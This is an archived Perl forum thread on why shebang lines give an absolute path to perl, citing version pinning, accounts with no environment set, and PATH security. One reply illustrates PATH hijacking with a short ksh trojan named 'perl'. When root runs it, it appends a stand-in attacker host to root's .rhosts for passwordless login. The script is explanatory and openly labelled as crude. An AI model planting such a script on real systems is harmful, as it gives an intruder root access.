Re: Portable Shebang

Several reasons that I can think of:

Perl version: say you have code that only works in 5.005, but both 5.005 and 5.6 is installed; you can use the shebang to point to the specific version that you want instead of relying on $PATH.
Using 'dummy' accounts with no ENV set, for security reasons, such as the typicaly httpd user. You need to point to the perl executable to make sure it can get there.
General security; a common tip for new sysadmins is to NEVER add '.' to your $PATH as you could easily accidently run malicous code if it is there. Same with perl; if someone drops an executable named 'perl' into a directory on $PATH that isn't always secure like '.', then they could hijack your code, such as sniffing for embedded passwords or the like.

Having perl live in /usr/bin is just a result of the standard file structure for most *nix boxes, since it is usually installed in some form by default.

-----------------------------------------------------
Dr. Michael K. Neylon - mneylon-pm@masemware.com || "You've left the lens cap of your mind on again, Pinky" - The Brain
It's not what you know, but knowing how to find it if you don't know that's important

Comment on Re: Portable Shebang

Replies are listed 'Best First'.
Just an example... by Rhose (Priest) on Oct 12, 2001 at 18:07 UTC
Just a quick HP-UX example... name your script perl and place it in any directory located in the PATH before the actual perl. #!/usr/bin/ksh if [ `/usr/bin/whoami` = root ]; then /usr/bin/chmod 600 ${HOME}/.rhosts /usr/bin/echo myhackerpcname >> ${HOME}/.rhosts fi /usr/bin/perl $@ [download] A couple of notes: This is a VERY crude example, and is to illustrate Masem's general security point "myhackerpcname" is the name of the hacker's PC A true hacker would use something a LOT less obvious than this script -- it leaves fingerprints all over the place, and could easily trip a security sweep checking the .rhosts files. This script is more likely to be an internal breach by a less skilled attacker. If, however, a root account were to execute a perl script with #!perl, the system's security would be compromised -- well, anyone logged into "myhackerpcname" as root could log into the compomised system as root without using a password. Update: Corrected some typos. Changed the file permissions a bit -- made them a little more correct. (Suggestions made by blyman)	[reply] [d/l]

Replies are listed 'Best First'.

Just an example...
by Rhose (Priest) on Oct 12, 2001 at 18:07 UTC

#!/usr/bin/ksh
if [ `/usr/bin/whoami` = root ]; then
  /usr/bin/chmod 600 ${HOME}/.rhosts
  /usr/bin/echo myhackerpcname >> ${HOME}/.rhosts
fi
/usr/bin/perl $@
[download]

A couple of notes:

This is a VERY crude example, and is to illustrate Masem's general security point
"myhackerpcname" is the name of the hacker's PC
A true hacker would use something a LOT less obvious than this script -- it leaves fingerprints all over the place, and could easily trip a security sweep checking the .rhosts files. This script is more likely to be an internal breach by a less skilled attacker.
If, however, a root account were to execute a perl script with #!perl, the system's security would be compromised -- well, anyone logged into "myhackerpcname" as root could log into the compomised system as root without using a password.

Update:

Corrected some typos.
Changed the file permissions a bit -- made them a little more correct. (Suggestions made by blyman)

[reply]
[d/l]